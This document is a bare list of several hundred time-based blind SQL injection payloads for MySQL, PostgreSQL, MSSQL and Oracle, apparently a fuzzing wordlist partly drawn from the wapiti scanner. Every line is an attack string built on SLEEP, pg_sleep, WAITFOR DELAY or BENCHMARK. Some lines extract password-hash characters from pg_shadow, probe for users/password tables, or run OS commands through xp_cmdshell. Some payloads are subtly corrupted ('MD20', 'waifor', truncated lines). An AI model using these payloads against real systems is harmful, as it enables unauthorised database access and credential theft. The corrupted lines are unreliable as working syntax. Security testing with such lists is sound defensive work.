" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND "1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND "1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
" AND 1337=BENCHMARK(20000000,MD20(0x2076e7a207)) AND "1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(20)) AND "1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(20)) AND "1337"="1337
" AND ELT(1337=1337,SLEEP(20))-- 1337
" AND SLEEP(20)#
" OR SLEEP(20)#
" RLIKE SLEEP(20) AND "1337" LIKE "1337
" RLIKE SLEEP(20) AND "1337"="1337
" RLIKE SLEEP(20)-- 1337
" WAITFOR DELAY '0:0:20'--
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
" WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
" or pg_sleep(20)--
" or sleep(20)#
" or sleep(20)="
" waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
") AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ("1337" LIKE "1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ("1337"="1337
") AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ("1337" LIKE "1337
") AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ("1337"="1337
") AND ELT(1337=1337,SLEEP(20)) AND ("1337" LIKE "1337
") AND ELT(1337=1337,SLEEP(20)) AND ("1337"="1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
") IF (1=1) WAITFOR DELAY '0:0:20'--
") RLIKE SLEEP(20) AND ("1337" LIKE "1337
") RLIKE SLEEP(20) AND ("1337"="1337
") WAITFOR DELAY '0:0:20'--
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
") WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
") and 0=benchmark(3000000,MD20(1))%20%23
") and 0=benchmark(3000000,MD20(1))%20--
") and 0=benchmark(3000000,MD20(1))%20/*
") or benchmark(10000000,MD20(1))#
") or pg_sleep(20)--
") or sleep(20)="
") waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
")%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
")) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (("1337"="1337
")) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND (("1337" LIKE "1337
")) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND (("1337"="1337
")) AND ELT(1337=1337,SLEEP(20)) AND (("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(20)) AND (("1337"="1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
")) RLIKE SLEEP(20) AND (("1337" LIKE "1337
")) RLIKE SLEEP(20) AND (("1337"="1337
")) WAITFOR DELAY '0:0:20'--
")) and 0=benchmark(20000000,MD20(1))%20%23
")) and 0=benchmark(20000000,MD20(1))%20--
")) and 0=benchmark(20000000,MD20(1))%20/*
")) or benchmark(20000000,MD20(1))#
")) or pg_sleep(20)--
")) or sleep(20)="
")) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
"))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((("1337"="1337
"))) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ((("1337" LIKE "1337
"))) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ((("1337"="1337
"))) AND ELT(1337=1337,SLEEP(20)) AND ((("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(20)) AND ((("1337"="1337
"))) RLIKE SLEEP(20) AND ((("1337" LIKE "1337
"))) RLIKE SLEEP(20) AND ((("1337"="1337
"))) WAITFOR DELAY '0:0:20'--
"))) and 0=benchmark(3000000,MD20(1))%20%23
"))) and 0=benchmark(3000000,MD20(1))%20--
"))) and 0=benchmark(3000000,MD20(1))%20/*
"))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
")))) and 0=benchmark(3000000,MD20(1))%20%23
")))) and 0=benchmark(3000000,MD20(1))%20--
")))) and 0=benchmark(3000000,MD20(1))%20/*
")))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
"));waitfor delay '0:0:20'--
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
");waitfor delay '0:0:20'--
",NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
";SELECT SLEEP(20); #
";SELECT pg_sleep(20);
";sleep 20
";sleep 20--
";sleep(20)
";sleep(20)--
";waitfor delay '0:0:20'--
# from wapiti
%' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337%'='1337
%' AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND '1337%'='1337
%' AND ELT(1337=1337,SLEEP(20)) AND '1337%'='1337
%' RLIKE SLEEP(20) AND '1337%'='1337
%' WAITFOR DELAY '0:0:20'--
%';SELECT PG_SLEEP(20)–
%2c(select%20*%20from%20(select(SLEEP(20)))a)
&&SLEEP(20)
&&SLEEP(20)#
&&SLEEP(20)--
' AND (SELECT * FROM (SELECT(SLEEP(20)))ZmTo)--
' AND (SELECT 1 FROM pg_sleep(20))--
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337' LIKE '1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) OR '1337'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(20)))YYYY) AND '1337'='1337
' AND (SELECT 8839 FROM (SELECT(SLEEP(20)))uzIY) AND 'mSUA'='mSUA
' AND 1337=BENCHMARK(20000000,MD20(0x2076e7a207)) AND '1337'='1337
' AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND '1337' LIKE '1337
' AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND '1337'='1337
' AND 1337=BENCHMARK(20000000,MD20(0x774c20341))-- 1337
' AND ELT(1337=1337,SLEEP(20)) AND '1337' LIKE '1337
' AND ELT(1337=1337,SLEEP(20)) AND '1337'='1337
' AND ELT(1337=1337,SLEEP(20)) OR '1337'='FMTE
' AND ELT(1337=1337,SLEEP(20))--
' AND ELT(1337=1337,SLEEP(20))-- 1337
' AND SLEEP(20)#
' AnD SLEEP(20) ANd '1
' OR ELT(1337=1337,SLEEP(20))--
' OR SLEEP(20)#
' ORDER BY SLEEP(20)
' RLIKE SLEEP(20) AND '1337' LIKE '1337
' RLIKE SLEEP(20) AND '1337'='1337
' RLIKE SLEEP(20) OR '1337'='1337
' RLIKE SLEEP(20)--
' RLIKE SLEEP(20)-- 1337
' SELECT SLEEP(20); #
' SELECT pg_sleep(20);
' WAITFOR DELAY '0:0:20'
' WAITFOR DELAY '0:0:20'--
' WAITFOR DELAY '0:0:20'–-
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
' WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
' and (select * from (select(sleep(20)))a)--
' and 0=benchmark(3000000,MD20(1))%20%23
' and 0=benchmark(3000000,MD20(1))%20--
' and 0=benchmark(3000000,MD20(1))%20/*
' and case when (substring(version(),1,1))='P' then pg_sleep(20) else sleep(20) end--
' and extractvalue(1,concat(0x5c,(select pg_sleep(20)),0x5c))--
' and if((select count
' and if((select count() from pg_shadow where usename='postgres' and substring(password from 1 for 1)='')=1,pg_sleep(20),0)--
' and if((select count(*) from information_schema.columns where table_name='users' and column_name='password')=1,pg_sleep(20),0)--
' and if((select count(*) from information_schema.columns where table_name='users' and table_schema='public')=1,pg_sleep(20),0)--
' and if((select count(*) from information_schema.columns where table_name='users')=1,pg_sleep(20),0)--
' and if((select count(*) from information_schema.tables where table_schema='public' and table_name='users')=1,pg_sleep(20),0)--
' and if((select count(*) from information_schema.tables where table_schema='public')=1,pg_sleep(20),0)--
' and if((select count(*) from pg_shadow where usename='postgres' and length(password)>1)=1,pg_sleep(20),0)--
' and if((select count(*) from pg_shadow where usename='postgres' and substring(password from 1 for 1)='$')=1,pg_sleep(20),0)--
' and if((select count(*) from pg_shadow where usename='postgres' and substring(password from 1 for 1)='md5')=1,pg_sleep(20),0)--
' and if((select count(*) from pg_shadow where usename='postgres' and substring(password from 1 for 3)='md5')=1,pg_sleep(20),0)--
' and if((select count(*) from pg_shadow where usename='postgres')=1,pg_sleep(20),0)--
' and if((select count(*) from pg_user where usename='postgres')=1,pg_sleep(20),0)--
' and if(ascii(substr((select column_name from information_schema.columns limit 1),1,1))=97,pg_sleep(20),0)--
' and if(ascii(substr((select table_name from information_schema.tables limit 1),1,1))=97,pg_sleep(20),0)--
' and if(length((select table_name from information_schema.tables limit 1))=1,pg_sleep(20),0)--
' and if(length(current_database())=1,pg_sleep(20),0)--
' and if(length(current_user)=1,pg_sleep(20),0)--
' and if(length(database())=1,pg_sleep(20),0)--
' and if(length(user)=1,pg_sleep(20),0)--
' and if(substring((select version()),1,1)='P',pg_sleep(20),sleep(20))--
' and pg_sleep(20)--
' and sleep 20
' and sleep 20 and '1'='1
' and sleep 20--
' and sleep(20)
' and sleep(20) and '1'='1
' and sleep(20)--
' and updatexml(null,concat(0x5c,(select pg_sleep(20)),0x5c),null)--
' or benchmark(10000000,MD20(1))#
' or pg_sleep(20)--
' or sleep(20)#
' or sleep(20)='
' waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
'%2b(select*from(select(sleep(20)))a)%2b'
'&&SLEEP(20)&&'1
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ('1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ('PBiy'='PBiy
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(20)))YYYY) AND ('1337'='1337
') AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ('1337' LIKE '1337
') AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ('1337'='1337
') AND 1337=BENCHMARK(20000000,MD20(0x774c20341))-- 1337
') AND =BENCHMARK(20000000,MD20(0x774c20341))--
') AND ELT(1337=1337,SLEEP(20)) AND ('1337' LIKE '1337
') AND ELT(1337=1337,SLEEP(20)) AND ('1337'='1337
') AND ELT(1337=1337,SLEEP(20))-- 1337
') AND SLEEP(20)#OR BLIND:or sleep 20--
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
') OR SLEEP(20)#
') RLIKE SLEEP(20) AND ('1337' LIKE '1337
') RLIKE SLEEP(20) AND ('1337'='1337
') RLIKE SLEEP(20)-- 1337
') WAITFOR DELAY '0:0:20'--
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
') WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
') and 0=benchmark(3000000,MD20(1))%20%23
') and 0=benchmark(3000000,MD20(1))%20--
') and 0=benchmark(3000000,MD20(1))%20/*
') or benchmark(10000000,MD20(1))#
') or pg_sleep(20)--
') or sleep(20)='
') waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
')%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
')) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (('1337' LIKE '1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (('1337'='1337
')) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND (('1337' LIKE '1337
')) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND (('1337'='1337
')) AND ELT(1337=1337,SLEEP(20)) AND (('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(20)) AND (('1337'='1337
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
')) RLIKE SLEEP(20) AND (('1337' LIKE '1337
')) RLIKE SLEEP(20) AND (('1337'='1337
')) WAITFOR DELAY '0:0:20'--
')) and 0=benchmark(3000000,MD20(1))%20%23
')) and 0=benchmark(3000000,MD20(1))%20--
')) and 0=benchmark(3000000,MD20(1))%20/*
')) or benchmark(10000000,MD20(1))#
')) or pg_sleep(20)--
')) or sleep(20)='
')) waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
'))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((('1337'='1337
'))) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ((('1337' LIKE '1337
'))) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ((('1337'='1337
'))) AND ELT(1337=1337,SLEEP(20)) AND ((('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(20)) AND ((('1337'='1337
'))) RLIKE SLEEP(20) AND ((('1337' LIKE '1337
'))) RLIKE SLEEP(20) AND ((('1337'='1337
'))) WAITFOR DELAY '0:0:20'--
'))) and 0=benchmark(3000000,MD20(1))%20%23
'))) and 0=benchmark(3000000,MD20(1))%20--
'))) and 0=benchmark(3000000,MD20(1))%20/*
'))) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
')))) and 0=benchmark(3000000,MD20(1))%20%23
')))) and 0=benchmark(3000000,MD20(1))%20--
')))) and 0=benchmark(3000000,MD20(1))%20/*
')))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
'));waitfor delay '0:0:20'--
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
');waitfor delay '0:0:20'--
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+'
',NULL)%20waifor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'; DECLARE @waitfor VARCHAR(20) SET @waitfor='20:00' WAITFOR TIME @waitfor--
'; IF (SELECT @@VERSION) LIKE '%Microsoft%' WAITFOR DELAY '00:00:20'--
'; IF (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES)>0 WAITFOR DELAY '00:00:20'--
'; IF (SELECT DB_NAME())='master' WAITFOR DELAY '00:00:20'--
'; IF (SELECT OBJECT_ID('tempdb..#x')) IS NOT NULL WAITFOR DELAY '00:00:20'--
'; IF (SELECT OBJECT_ID('tempdb..#x')) IS NULL WAITFOR DELAY '00:00:20'--
'; IF EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES) WAITFOR DELAY '00:00:20'--
'; IF EXISTS(SELECT * FROM sys.objects WHERE name='temp'+'name') WAITFOR DELAY '00:00:20'--
'; IF EXISTS(SELECT 1 FROM sys.databases WHERE name='master') WAITFOR DELAY '00:00:20'--
'; IF EXISTS(SELECT 1/0 FROM sys.databases WHERE name='master') WAITFOR DELAY '00:00:20'--
'; SELECT CASE WHEN (1=1) THEN pg_sleep(20) ELSE pg_sleep(0) END--
'; SELECT pg_sleep(20)--
'; WAITFOR DELAY '00:00:20'--
'; WAITFOR DELAY '0:0:20'--
'; WAITFOR TIME '00:00:20'--
'; dbms_pipe.receive_message(CHR(66)||CHR(66)||CHR(66),20)--
'; exec master..xp_cmdshell 'ping 1.1.1.1 -n 1 -w 20000'--
'; exec master..xp_cmdshell 'sleep 20'--
'; exec master..xp_cmdshell 'timeout /T 20'--
'; exec('WAITFOR DELAY ''0:0:20''%00')--
'; exec('WAITFOR DELAY ''0:0:20''')--
'; exec('WAITFOR DELAY ''0:0:20''--')--
'; exec('WAITFOR DELAY ''0:0:20''/*')--
'; exec('WAITFOR DELAY ''0:0:20'';')--
'; exec('WAITFOR TIME ''00:00:20''')--
'; exec('WAITFOR TIME ''00:00:20''--')--
'; exec('WAITFOR TIME ''00:00:20''/*')--
'; exec('WAITFOR TIME ''00:00:20'';')--
';%20waitfor%20delay%20'0:0:20'%20--%20
';WAITFOR DELAY '0:0:20'--
';WAITFOR DELAY ‘00:00:20’;--
';waitfor delay '0:0:20'--
'XOR(if(now()=sysdate(),sleep(20),0))XOR'
'XOR(if(now()=sysdate(),sleep(20*1),0))OR'
'XOR(if(now()=sysdate(),sleep(20*1),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(201),0))XOR'Z1 AND (SELECT  FROM (SELECT(SLEEP(20)))YYYY) AND '%'='
'| |pg_sleep(20)–
'||(SELECT 0x4c4204f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||'
'||(SELECT 0x727a20277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||'
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)--
(SELECT SLEEP(20))
(SELECT pg_sleep(20))
(select(0)from(select(sleep(20)))v)
(select(0)from(select(sleep(20)))v)%2f'+(select(0)from(select(sleep(20)))v)+'"
(select(0)from(select(sleep(20)))v)/'+(select(3)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"/
(select*from(select(SLEEP(20)))a)
(select*from(select(SLEEP(20)))a)#
(select*from(select(SLEEP(20)))a)++
(select*from(select(SLEEP(20)))a)--%20-
(select*from(select(sleep(20)))a)
(sleep 20)
(sleep 20)--
(sleep(20))
(sleep(20))--
) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (1337=1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
) AND ELT(1337=1337,SLEEP(20)) AND (1337=1337
) AND ELT(1337=1337,SLEEP(20))-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
) RLIKE SLEEP(20) AND (1337=1337
) RLIKE SLEEP(20)-- 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
) WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
) and 0=benchmark(20000000,MD20(1))%20%23
) and 0=benchmark(20000000,MD20(1))%20--
) and 0=benchmark(20000000,MD20(1))%20/*
) waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
)%20waitfor%20delay%20'0:0:20'%20--
)%20waitfor%20delay%20'0:0:20'%20/*
)) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((1337=1337
)) AND ELT(1337=1337,SLEEP(20)) AND ((1337=1337
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
)) RLIKE SLEEP(20) AND ((1337=1337
)) and 0=benchmark(3000000,MD20(1))%20%23
)) and 0=benchmark(3000000,MD20(1))%20--
)) and 0=benchmark(3000000,MD20(1))%20/*
)) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
))%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (((1337=1337
))) AND ELT(1337=1337,SLEEP(20)) AND (((1337=1337
))) RLIKE SLEEP(20) AND (((1337=1337
))) and 0=benchmark(3000000,MD20(1))%20%23
))) and 0=benchmark(3000000,MD20(1))%20--
))) and 0=benchmark(3000000,MD20(1))%20/*
))) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
)))) and 0=benchmark(3000000,MD20(1))%20%23
)))) and 0=benchmark(3000000,MD20(1))%20--
)))) and 0=benchmark(3000000,MD20(1))%20/*
)))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
));waitfor delay '0:0:20'--
),NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
);waitfor delay '0:0:20'--
+ SLEEP(20) + '
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY))+
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(20))+
+benchmark(3200,SHA1(1))+'
, AND (SELECT 8839 FROM (SELECT(SLEEP(20)))uzIY) AND 'mSUA'='mSUA
,(select * from (select(sleep(20)))a)
,(select*from(select(SLEEP(20)))a)
,(select*from(select(SLEEP(20)))a)#
,(select*from(select(SLEEP(20)))a)++
,(select*from(select(SLEEP(20)))a)--
,(select*from(select(SLEEP(20)))a)--%20-
,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
